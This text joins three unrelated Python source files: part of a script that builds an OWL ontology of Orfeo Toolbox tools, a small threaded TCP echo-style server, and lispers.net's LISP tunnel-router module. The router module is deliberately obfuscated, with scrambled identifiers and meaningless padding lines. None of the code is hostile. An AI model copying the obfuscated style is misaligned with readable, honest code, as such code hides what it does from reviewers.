class OTBTool(gb.GeoprocessingFunctionality):
pass
class OTBInput(cyber.Input):
pass
class OTBOutput(cyber.Output):
pass
class OTBConstraint(cyber.Constraint):
pass
class OTBAvailableChoice(cyber.AvailableChoice):
pass
class OTBOption(cyber.Option):
pass
onto.metadata.creator.append('houzhiwei')
onto.metadata.title.append('Orfeo-Toolbox Tools')
onto.metadata.created.append(datetime.datetime.today())
onto.metadata.versionInfo.append('6.6.1')
def handle_task(tool, category, task_name, des):
config = OWLUtils.get_config(module_path + '/config.ini')
task_cls = config.get('task', category)
# avoid duplicate
i_task_name = task_name.replace(' ', '_')
if not task[i_task_name + "_task"]:
task_ins = task[task_cls](i_task_name + "_task", prefLabel=locstr(task_name + " task", lang='en'))
task_ins.isAtomicTask = True
task_ins.identifier = i_task_name
else:
task_ins = task[i_task_name + "_task"]
if (task_ins in tool.usedByTask) is False:
tool.usedByTask.append(task_ins)
if (tool in tool.processingTool) is False:
task_ins.processingTool.append(tool)
task_ins.description.append(locstr(des, lang='en'))
def get_datatype(k):
config = OWLUtils.get_config(module_path + '/config.ini')
_type = OWLUtils.get_option(config, 'datatype', k)
if _type is None:
return 'http://www.w3.org/2001/XMLSchema#string'
else:
return _type
def handle_parameters(tool, param):
# 部分parameter不包含isInputFile等属性
p = None
parameterName = param['parameterName']
_name = Preprocessor.io_name(parameterName,onto)
if 'isInputFile' in param.keys() and param['isInputFile']:
p = OTBInput(_name,prefLabel=locstr(parameterName, lang='en'))
# p = OTBInput(0, prefLabel=locstr(param['name'], lang='en'))
tool.input.append(p)
p.isInput = param['isInputFile']
p.supportsDataFormat.append(data.GeoTIFF)
OWLUtils.link_to_domain_concept(p, parameterName.replace('_', ' '))
elif 'isOutputFile' in param.keys() and param['isOutputFile']:
p = OTBOutput(_name,prefLabel=locstr(parameterName, lang='en'))
# p = OTBOutput(0, prefLabel=locstr(parameterName, lang='en'))
tool.output.append(p)
p.isOutput = param['isOutputFile']
p.supportsDataFormat.append(data.GeoTIFF)
OWLUtils.link_to_domain_concept(p, parameterName.replace('_', ' '))
p.flag = param['flag']
p.identifier = parameterName
if 'dataType' in param.keys() and param['dataType']:
p.datatypeInString.append(param['dataType'])
p.datatype.append(OWLUtils.get_datatype_iris(param['dataType']))
p.description.append(locstr(' '.join(param['explanation']), lang='en'))
# p.isOptional = param['isOptional'] # no this information in document
def handle_options(tool, param, _onto):
parameterName = param['parameterName']
_name = Preprocessor.io_name(parameterName,_onto)
o = OTBOption(_name,prefLabel=locstr(parameterName, lang='en'))
# p = OTBOption(0, prefLabel=locstr(parameterName, lang='en'))
tool.option.append(o)
o.identifier = parameterName
if 'dataType' in param.keys() and param['dataType']:
if param['dataType'] == "Choices":
o.datatypeInString.append('String')
o.datatypeInString.append(param['dataType'])
# sc.datatype.append(IRIS[get_datatype(param['dataType'])])
o.description.append(''.join(param['explanation']))
# p.isOptional = param['isOptional']
if 'availableChoices' in param.keys() and param['availableChoices']:
o, onto = OWLUtils.handle_choices(o, parameterName, param['availableChoices'], OTBAvailableChoice, _onto)
def map_to_owl(json_data):
for d in json_data:
"""mapping json data to ontology properties"""
if d['category'] == 'Deprecated':
continue
name_str = d['name']
toolClass = tool_class(d['category'])
tool = toolClass(name_str, prefLabel=locstr(d['label'], lang='en'))
OWLUtils.application_category(tool, [], d['category'], [])
tool.isToolOfSoftware.append(cyber.OrfeoToolBox)
tool.identifier = name_str
tool.manualPageURL.append(normstr(d['manual_url']))
tool.executable = d['command']
tool.description.append(locstr(d['description'], lang='en'))
tool.definition.append(d['definition'])
keywords = OWLUtils.to_keywords(d['description'])
keywords.extend(d['label'].split(" "))
# keywords=d['label'].split(" ")
OWLUtils.link_to_domain_concept(tool, keywords)
if d['authors']:
tool.authors.append(d['authors'])
for ex in d['example']:
tool.example.append(ex.replace(' . ','.'))
handle_task(tool, d['category'], d['label'], d['description'])
for parameter in d['parameters']:
handle_parameters(tool, parameter)
for option in d['options']:
handle_options(tool, option, onto)
def tool_class(category):
tool_cls = category.replace(' ', '') + 'Tool'
return OWLUtils.create_onto_class(onto, tool_cls, OTBTool)
if __name__ == "__main__":
module_path = os.path.dirname(__file__)
with open(module_path + '/otb.json', 'r') as f:
jdata = json.load(f) # list
# print(len(jdata))
# otherwise will report stack overflow exception
threading.stack_size(2000000)
thread = threading.Thread(target=map_to_owl(jdata))
thread.start()
onto.save(file='otb.owl', format="rdfxml")
# update task ontology
task.save()
print('OTB Done!')
|
server.py | import socket
import threading
from typing import Tuple
from constants import SERVER_HOST_PORT
def setup_server(address: Tuple[str, str], backlog: int = 100) -> socket.socket:
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(address)
server_socket.listen(backlog)
return server_socket
def process_client(client_socket: socket.socket) -> None:
while True:
msg = client_socket.recv(1024).decode()
if not msg:
break
fmt_msg = f"msg received: {msg}"
print(fmt_msg)
client_socket.close()
if __name__ == "__main__":
server_socket = setup_server(address=SERVER_HOST_PORT)
print("server is running")
while True:
client_socket, client_address = server_socket.accept()
print(f"{client_address} connected")
client_thread = threading.Thread(target=process_client, args=(client_socket,))
client_thread.start()
|
lisp-rtr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
import commands
import binascii
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = None
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )
OOo = None
Ii1IIii11 = None
Oooo0000 = None
if 22 - 22: Ii1I . IiII
I11 = [ ]
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
if 54 - 54: OOooOOo % O0 + I1IiiI - iII111i / I11i
iIiiI1 = None
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
oo0Ooo0 = ( os . getenv ( "LISP_RTR_FAST_DATA_PLANE" ) != None )
I1I11I1I1I = ( os . getenv ( "LISP_RTR_LATENCY_DEBUG" ) != None )
if 90 - 90: II111iiii + oO0o / o0oOOo0O0Ooo % II111iiii - O0
if 29 - 29: o0oOOo0O0Ooo / iIii1I11I1II1
if 24 - 24: O0 % o0oOOo0O0Ooo + i1IIi + I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if 40 - 40: oO0o . OoOoOO00 . Oo0Ooo . i1IIi
if 33 - 33: Ii1I + II111iiii % i11iIiiIii . ooOoO0o - I1IiiI
def O00oooo0O ( parameter ) :
global I11
if 22 - 22: OoooooooOO % I11i - iII111i . iIii1I11I1II1 * i11iIiiIii
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" ,
I11 ) )
if 32 - 32: Oo0Ooo * O0 % oO0o % Ii1I . IiII
if 61 - 61: ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
def Ii1IOo0o0 ( parameter ) :
global I11
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" , I11 ,
True ) )
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
def o00oOO0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "RTR" ) )
if 95 - 95: OOooOOo / OoooooooOO
if 18 - 18: i11iIiiIii
if 46 - 46: i1IIi / I11i % OOooOOo + I1Ii111
if 79 - 79: I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - iII111i
if 8 - 8: I1IiiI
if 75 - 75: iIii1I11I1II1 / OOooOOo % o0oOOo0O0Ooo * OoOoOO00
if 9 - 9: OoO0O00
def i11 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
def O0O0O ( kv_pair ) :
oO0Oo = { "rloc-probe" : False , "igmp-query" : False }
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
for O0o0 in kv_pair . keys ( ) :
OO00Oo = kv_pair [ O0o0 ]
if 51 - 51: IiII * o0oOOo0O0Ooo + I11i + OoO0O00
if ( O0o0 == "instance-id" ) :
o0O0O00 = OO00Oo . split ( "-" )
oO0Oo [ "instance-id" ] = [ 0 , 0 ]
if ( len ( o0O0O00 ) == 1 ) :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 0 ] )
else :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 1 ] )
if 86 - 86: I11i / IiII % i11iIiiIii
if 7 - 7: ooOoO0o * OoO0O00 % oO0o . IiII
if ( O0o0 == "eid-prefix" ) :
Ii1iIiII1ii1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Ii1iIiII1ii1 . store_prefix ( OO00Oo )
oO0Oo [ "eid-prefix" ] = Ii1iIiII1ii1
if 62 - 62: iIii1I11I1II1 * OoOoOO00
if ( O0o0 == "group-prefix" ) :
i1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
i1 . store_prefix ( OO00Oo )
oO0Oo [ "group-prefix" ] = i1
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if ( O0o0 == "rloc-prefix" ) :
iII1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
iII1 . store_prefix ( OO00Oo )
oO0Oo [ "rloc-prefix" ] = iII1
if 30 - 30: II111iiii - OOooOOo - i11iIiiIii % OoOoOO00 - II111iiii * Ii1I
if ( O0o0 == "rloc-probe" ) :
oO0Oo [ "rloc-probe" ] = ( OO00Oo == "yes" )
if 61 - 61: oO0o - I11i % OOooOOo
if ( O0o0 == "igmp-query" ) :
oO0Oo [ "igmp-query" ] = ( OO00Oo == "yes" )
if 84 - 84: oO0o * OoO0O00 / I11i - O0
if 30 - 30: iIii1I11I1II1 / ooOoO0o - I1Ii111 - II111iiii % iII111i
if 49 - 49: I1IiiI % ooOoO0o . ooOoO0o . I11i * ooOoO0o
if 97 - 97: Ii1I + o0oOOo0O0Ooo . OOooOOo + I1ii11iIi11i % iII111i
if 95 - 95: i1IIi
if 3 - 3: I1Ii111 - O0 / I1Ii111 % OoO0O00 / I1Ii111 . I1IiiI
for iiI111I1iIiI in lisp . lisp_glean_mappings :
if ( iiI111I1iIiI . has_key ( "eid-prefix" ) ^ oO0Oo . has_key ( "eid-prefix" ) ) : continue
if ( iiI111I1iIiI . has_key ( "eid-prefix" ) and oO0Oo . has_key ( "eid-prefix" ) ) :
II = iiI111I1iIiI [ "eid-prefix" ]
Ii1I1IIii1II = oO0Oo [ "eid-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if 65 - 65: Ii1I . iIii1I11I1II1 / O0 - Ii1I
if 21 - 21: I1IiiI * iIii1I11I1II1
if ( iiI111I1iIiI . has_key ( "group-prefix" ) ^ oO0Oo . has_key ( "group-prefix" ) ) :
continue
if 91 - 91: IiII
if ( iiI111I1iIiI . has_key ( "group-prefix" ) and oO0Oo . has_key ( "group-prefix" ) ) :
II = iiI111I1iIiI [ "group-prefix" ]
Ii1I1IIii1II = oO0Oo [ "group-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if 15 - 15: II111iiii
if 18 - 18: i11iIiiIii . i1IIi % OoooooooOO / O0
if ( iiI111I1iIiI . has_key ( "rloc-prefix" ) ^ oO0Oo . has_key ( "rloc-prefix" ) ) : continue
if ( iiI111I1iIiI . has_key ( "rloc-prefix" ) and oO0Oo . has_key ( "rloc-prefix" ) ) :
II = iiI111I1iIiI [ "rloc-prefix" ]
Ii1I1IIii1II = oO0Oo [ "rloc-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if 75 - 75: OoOoOO00 % o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1Ii111
if 5 - 5: o0oOOo0O0Ooo * ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if ( iiI111I1iIiI . has_key ( "instance-id" ) ^ oO0Oo . has_key ( "instance-id" ) ) : continue
if ( iiI111I1iIiI . has_key ( "instance-id" ) and oO0Oo . has_key ( "instance-id" ) ) :
II = iiI111I1iIiI [ "instance-id" ]
Ii1I1IIii1II = oO0Oo [ "instance-id" ]
if ( II != Ii1I1IIii1II ) : continue
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
return
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
lisp . lisp_glean_mappings . append ( oO0Oo )
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
if 1 - 1: iIii1I11I1II1 / II111iiii
def iiI1I11i1i ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "RTR" ) )
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
def IIIII11I1IiI ( mc , parms ) :
i1I , iII1 , OoOO , ooOOO0 = parms
if 65 - 65: O0
oO00OOoO00 = "{}:{}" . format ( iII1 . print_address_no_iid ( ) , OoOO )
Ii1iIiII1ii1 = lisp . green ( mc . print_eid_tuple ( ) , False )
IiI111111IIII = "Changed '{}' translated address:port to {} for EID {}, {} {}" . format ( ooOOO0 , lisp . red ( oO00OOoO00 , False ) , Ii1iIiII1ii1 , "{}" , "{}" )
if 37 - 37: I1Ii111 / OoOoOO00
if 23 - 23: O0
for o00oO0oOo00 in mc . rloc_set :
if ( o00oO0oOo00 . rle ) :
for oO0oOo0 in o00oO0oOo00 . rle . rle_nodes :
if ( oO0oOo0 . rloc_name != ooOOO0 ) : continue
oO0oOo0 . store_translated_rloc ( iII1 , OoOO )
I1I1I = oO0oOo0 . address . print_address_no_iid ( ) + ":" + str ( oO0oOo0 . translated_port )
if 95 - 95: II111iiii + o0oOOo0O0Ooo + iII111i * iIii1I11I1II1 % oO0o / IiII
lisp . lprint ( IiI111111IIII . format ( "RLE" , I1I1I ) )
if 56 - 56: iII111i
if 86 - 86: II111iiii % I1Ii111
if 15 - 15: i1IIi * I1IiiI + i11iIiiIii
if ( o00oO0oOo00 . rloc_name != ooOOO0 ) : continue
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
I1I1I = o00oO0oOo00 . rloc . print_address_no_iid ( ) + ":" + str ( o00oO0oOo00 . translated_port )
if 25 - 25: OoO0O00
if ( lisp . lisp_crypto_keys_by_rloc_encap . has_key ( I1I1I ) ) :
oOo0oO = lisp . lisp_crypto_keys_by_rloc_encap [ I1I1I ]
lisp . lisp_crypto_keys_by_rloc_encap [ oO00OOoO00 ] = oOo0oO
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
o00oO0oOo00 . delete_from_rloc_probe_list ( mc . eid , mc . group )
o00oO0oOo00 . store_translated_rloc ( iII1 , OoOO )
o00oO0oOo00 . add_to_rloc_probe_list ( mc . eid , mc . group )
lisp . lprint ( IiI111111IIII . format ( "RLOC" , I1I1I ) )
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if ( lisp . lisp_rloc_probing ) :
o0oOO000oO0oo = None if ( mc . group . is_null ( ) ) else mc . eid
oOO00O = mc . eid if ( mc . group . is_null ( ) ) else mc . group
lisp . lisp_send_map_request ( i1I , 0 , o0oOO000oO0oo , oOO00O , o00oO0oOo00 )
if 77 - 77: Oo0Ooo - i1IIi - I11i . OoOoOO00
if 39 - 39: II111iiii / ooOoO0o + I1Ii111 / OoOoOO00
if 13 - 13: IiII + O0 + iII111i % I1IiiI / o0oOOo0O0Ooo . IiII
if 86 - 86: oO0o * o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
lisp . lisp_write_ipc_map_cache ( True , mc )
return ( True , parms )
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
def OoOOoOooooOOo ( mc , parms ) :
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if ( mc . group . is_null ( ) ) : return ( IIIII11I1IiI ( mc , parms ) )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if ( mc . source_cache == None ) : return ( True , parms )
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
mc . source_cache . walk_cache ( IIIII11I1IiI , parms )
return ( True , parms )
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
def o00oo0 ( sockets , hostname , rloc , port ) :
lisp . lisp_map_cache . walk_cache ( OoOOoOooooOOo ,
[ sockets , rloc , port , hostname ] )
return
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
def o00Oo0oooooo ( sred , packet ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 76 - 76: I11i / OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if ( sred in [ "Send" , "Receive" ] ) :
o0o = binascii . hexlify ( packet [ 0 : 20 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}" . format ( sred , o0o [ 0 : 8 ] , o0o [ 8 : 16 ] ,
o0o [ 16 : 24 ] , o0o [ 24 : 32 ] , o0o [ 32 : 40 ] ) )
elif ( sred in [ "Encap" , "Decap" ] ) :
o0o = binascii . hexlify ( packet [ 0 : 36 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}, udp {} {}, lisp {} {}" . format ( sred , o0o [ 0 : 8 ] , o0o [ 8 : 16 ] , o0o [ 16 : 24 ] , o0o [ 24 : 32 ] , o0o [ 32 : 40 ] ,
# iIii1I11I1II1 / I11i . OoO0O00 - o0oOOo0O0Ooo
o0o [ 40 : 48 ] , o0o [ 48 : 56 ] , o0o [ 56 : 64 ] , o0o [ 64 : 72 ] ) )
if 48 - 48: i1IIi - Ii1I / O0 * OoO0O00
if 71 - 71: I1ii11iIi11i
if 7 - 7: I1ii11iIi11i - I1IiiI . iIii1I11I1II1 - i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
def ii ( dest , mc ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 68 - 68: iII111i - I1IiiI / I1Ii111 / I11i
I11iiii = "miss" if mc == None else "hit!"
lisp . lprint ( "Fast-Lookup {} {}" . format ( dest . print_address ( ) , I11iiii ) )
if 60 - 60: I11i . i1IIi + IiII / o0oOOo0O0Ooo . II111iiii
if 82 - 82: I1ii11iIi11i / I1IiiI % iIii1I11I1II1 / i1IIi - I1IiiI
if 7 - 7: I1Ii111 * OoO0O00 - ooOoO0o + OOooOOo * I1IiiI % OoO0O00
if 15 - 15: OoOoOO00 % I1IiiI * I11i
if 81 - 81: ooOoO0o - iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * I11i
if 20 - 20: oO0o % IiII
if 19 - 19: I1ii11iIi11i % IiII + ooOoO0o / I1Ii111 . ooOoO0o
if 12 - 12: i1IIi + i1IIi - I1ii11iIi11i * Oo0Ooo % Oo0Ooo - II111iiii
def o0O ( ts , msg ) :
global I1I11I1I1I
if 84 - 84: OoO0O00 + i1IIi - II111iiii . I1ii11iIi11i * OoooooooOO + I1IiiI
if ( I1I11I1I1I == False ) : return ( None )
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if ( ts == None ) : return ( time . time ( ) )
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
ts = ( time . time ( ) - ts ) * 1000000
lisp . lprint ( "{}-Latency: {} usecs" . format ( msg , round ( ts , 1 ) ) , "force" )
return ( None )
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
def I1IiIiiIiIII ( a ) :
iIIi = ord ( a [ 0 ] ) << 24 | ord ( a [ 1 ] ) << 16 | ord ( a [ 2 ] ) << 8 | ord ( a [ 3 ] )
return ( iIIi )
if 11 - 11: I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if 42 - 42: I1Ii111 . I1IiiI . i1IIi + OoOoOO00 + OOooOOo + I1IiiI
if 31 - 31: iII111i . OOooOOo - ooOoO0o . OoooooooOO / OoooooooOO
if 56 - 56: OoO0O00 / oO0o / i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
iiI1I1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
ooO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 6 - 6: iIii1I11I1II1 . ooOoO0o % o0oOOo0O0Ooo
def I1Iii1 ( packet ) :
global lisp_map_cache , OOo
if 30 - 30: OoooooooOO - OoOoOO00
Ooo00O0o = o0O ( None , "Fast" )
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
